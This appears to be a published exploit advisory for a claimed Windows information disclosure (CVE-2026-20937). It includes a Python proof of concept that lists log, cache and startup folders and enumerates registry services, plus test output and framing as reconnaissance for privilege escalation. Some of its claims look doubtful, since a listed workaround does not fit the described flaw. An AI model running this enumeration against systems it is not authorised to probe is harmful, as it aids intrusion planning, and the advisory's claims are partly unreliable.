📄 Windows File Explorer Information Disclosure

# Exploit Title: Windows File Explorer Information Disclosure
    (CVE-2026-20937)
    # Date: 2026-02-24
    # Exploit Author: nu11secur1ty
    # Vendor Homepage: https://www.microsoft.com
    # Version: Windows 11 build 26200 (also affects Windows 10 1809, 21H2, 22H2)
    # Tested on: Windows 11 Pro build 26200
    # Repository:
    https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2026/CVE-2026-20937
    # CVE: CVE-2026-20937
    
    
    [1] VULNERABILITY DESCRIPTION
    ------------------------------------------------------------------------
    Windows File Explorer fails to properly restrict access to sensitive
    system locations, allowing a low-privileged local user to view:
    - System log files (C:\Windows\System32\LogFiles)
    - Application caches (C:\ProgramData\Microsoft\Windows\Caches)
    - Startup programs (C:\ProgramData\Microsoft\Windows\Start
    Menu\Programs\StartUp)
    - Registry service configurations (HKLM\SYSTEM\CurrentControlSet\Services)
    - Other user profiles (C:\Users\[other users])
    
    This information disclosure can be leveraged for further targeted attacks,
    reconnaissance, and privilege escalation attempts.
    
    CVSS Score: 5.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    
    
    [2] PROOF OF CONCEPT
    ------------------------------------------------------------------------
    The following Python script demonstrates the vulnerability by accessing
    sensitive locations through standard Windows APIs:
    
    ----- BEGIN PoC -----
    #!/usr/bin/env python3
    """
    CVE-2026-20937 - Windows File Explorer Information Disclosure PoC
    Author: nu11secur1ty
    Tested on: Windows 11 build 26200
    """
    
    import os
    import winreg
    from pathlib import Path
    
    def main():
        print("\n" + "="*60)
        print("CVE-2026-20937 - INFORMATION DISCLOSURE PoC")
        print("Running as: " + os.environ.get('USERNAME', 'Unknown'))
        print("="*60)
    
        findings = []
    
        # 1. Check LogFiles access
        log_path = Path("C:/Windows/System32/LogFiles")
        if log_path.exists():
            try:
                items = list(log_path.iterdir())[:5]
                findings.append(f"[!] ACCESSIBLE: {log_path}")
                findings.append(f"    Found: {[i.name for i in items]}")
            except PermissionError:
                findings.append("[+] SECURE: LogFiles not accessible")
    
        # 2. Check Caches access
        cache_path = Path("C:/ProgramData/Microsoft/Windows/Caches")
        if cache_path.exists():
            try:
                items = list(cache_path.glob("*.db"))[:5]
                findings.append(f"[!] ACCESSIBLE: {cache_path}")
                findings.append(f"    Found {len(items)} cache files")
            except PermissionError:
                findings.append("[+] SECURE: Caches not accessible")
    
        # 3. Check Startup folder
        startup_path = Path("C:/ProgramData/Microsoft/Windows/Start
    Menu/Programs/StartUp")
        if startup_path.exists():
            try:
                items = list(startup_path.iterdir())
                findings.append(f"[!] ACCESSIBLE: {startup_path}")
                findings.append(f"    Found: {[i.name for i in items]}")
            except PermissionError:
                findings.append("[+] SECURE: Startup not accessible")
    
        # 4. Check registry services
        try:
            key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                                r"SYSTEM\CurrentControlSet\Services",
                                0, winreg.KEY_READ)
            count = 0
            oracle_services = []
            while True:
                try:
                    name = winreg.EnumKey(key, count)
                    if 'oracle' in name.lower():
                        oracle_services.append(name)
                    count += 1
                except WindowsError:
                    break
            winreg.CloseKey(key)
            findings.append(f"[!] ACCESSIBLE:
    HKLM\\SYSTEM\\CurrentControlSet\\Services")
            findings.append(f"    Found {count} services,
    {len(oracle_services)} Oracle services")
        except:
            findings.append("[+] SECURE: Registry services not accessible")
    
        # Print results
        print("\n".join(findings))
    
        if any("[!]" in f for f in findings):
            print("\n[!] VULNERABLE: System allows information disclosure")
            print("[!] CVE-2026-20937 CONFIRMED")
        else:
            print("\n[+] System appears patched")
    
    if __name__ == "__main__":
        main()
    ----- END PoC -----
    
    
    [3] VULNERABLE SYSTEMS
    ------------------------------------------------------------------------
    Windows 11:
    - Build 26200 (confirmed vulnerable)
    - Build 26100
    - Build 22631
    
    Windows 10:
    - Build 19045 (22H2)
    - Build 19044 (21H2)
    - Build 17763 (1809)
    
    Windows Server:
    - Server 2025
    - Server 2022
    - Server 2019
    
    
    [4] EXPLOITATION RESULTS - ACTUAL TEST OUTPUT
    ------------------------------------------------------------------------
    Test Environment:
    - OS: Windows 11 Pro
    - Build: 26200
    - User: MicroBug (standard user)
    - Computer: MICROPROBLEM
    
    FINDINGS:
    [!] ACCESSIBLE: C:\Windows\System32\LogFiles
        Found: ['CloudFiles', 'setupcln', 'WMI']
    [!] ACCESSIBLE: C:\ProgramData\Microsoft\Windows\Caches
        Found 4 cache files including:
        - cversions.2.db
        - {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db
        - {DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000005.db
    [!] ACCESSIBLE: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
        Found: ['desktop.ini']
    [!] ACCESSIBLE: HKLM\SYSTEM\CurrentControlSet\Services
        Found 800+ services including Oracle services:
        - OracleJobSchedulerORCL
        - OracleOraDB19Home1MTSRecoveryService
        - OracleOraDB19Home1TNSListener
        - OracleRemExecServiceV2
        - OracleServiceORCL
        - OracleVssWriterORCL
    
    Additional information disclosed:
    - Full PATH environment revealing Oracle installation in another user's
    profile
    - Other user profiles visible: Default, Default User, DefaultAccount$,
    DefaultAppPool
    - Windows version and build details
    - Running processes with usernames
    
    
    [5] IMPACT
    ------------------------------------------------------------------------
    A local attacker with standard user privileges can:
    
    1. Harvest system logs for sensitive information (IPs, usernames, errors)
    2. Analyze application caches to determine user activity patterns
    3. View startup programs to understand persistence mechanisms
    4. Enumerate all services to identify potential privilege escalation vectors
    5. Discover Oracle database presence and paths for targeted attacks
    6. Map out other users on the system
    7. Gather environment variables containing paths to sensitive applications
    
    This information can be used to:
    - Plan privilege escalation attacks
    - Target specific high-value services (Oracle, Java, Python)
    - Identify misconfigurations
    - Perform reconnaissance before exploitation
    
    
    [6] MITIGATION
    ------------------------------------------------------------------------
    Apply Microsoft security updates from January 2026:
    - KB5050577 (Windows 11)
    - KB5050568 (Windows 10)
    - KB5050569 (Windows Server)
    
    Workarounds:
    1. Restrict access to sensitive directories using Advanced Security Settings
    2. Enable auditing on sensitive locations (Event ID 4663)
    3. Monitor for unauthorized access to C:\Windows\System32\LogFiles
    4. Restrict outbound SMB/NTLM to prevent UNC path leaks
    
    
    [7] REFERENCES
    ------------------------------------------------------------------------
    - CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-20937
    - Microsoft Security Update:
    https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20937
    - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-20937
    - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
    
    
    [8] DISCOVERY CREDITS
    ------------------------------------------------------------------------
    Discovered and verified by: nu11secur1ty
    Test Date: February 24, 2026
    Test Environment: Windows 11 Pro build 26200
    
    ====================================================================
    
    -- 
    
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstorm.news/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    0day Exploit DataBase https://0day.today/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                              nu11secur1ty <http://nu11secur1ty.com/>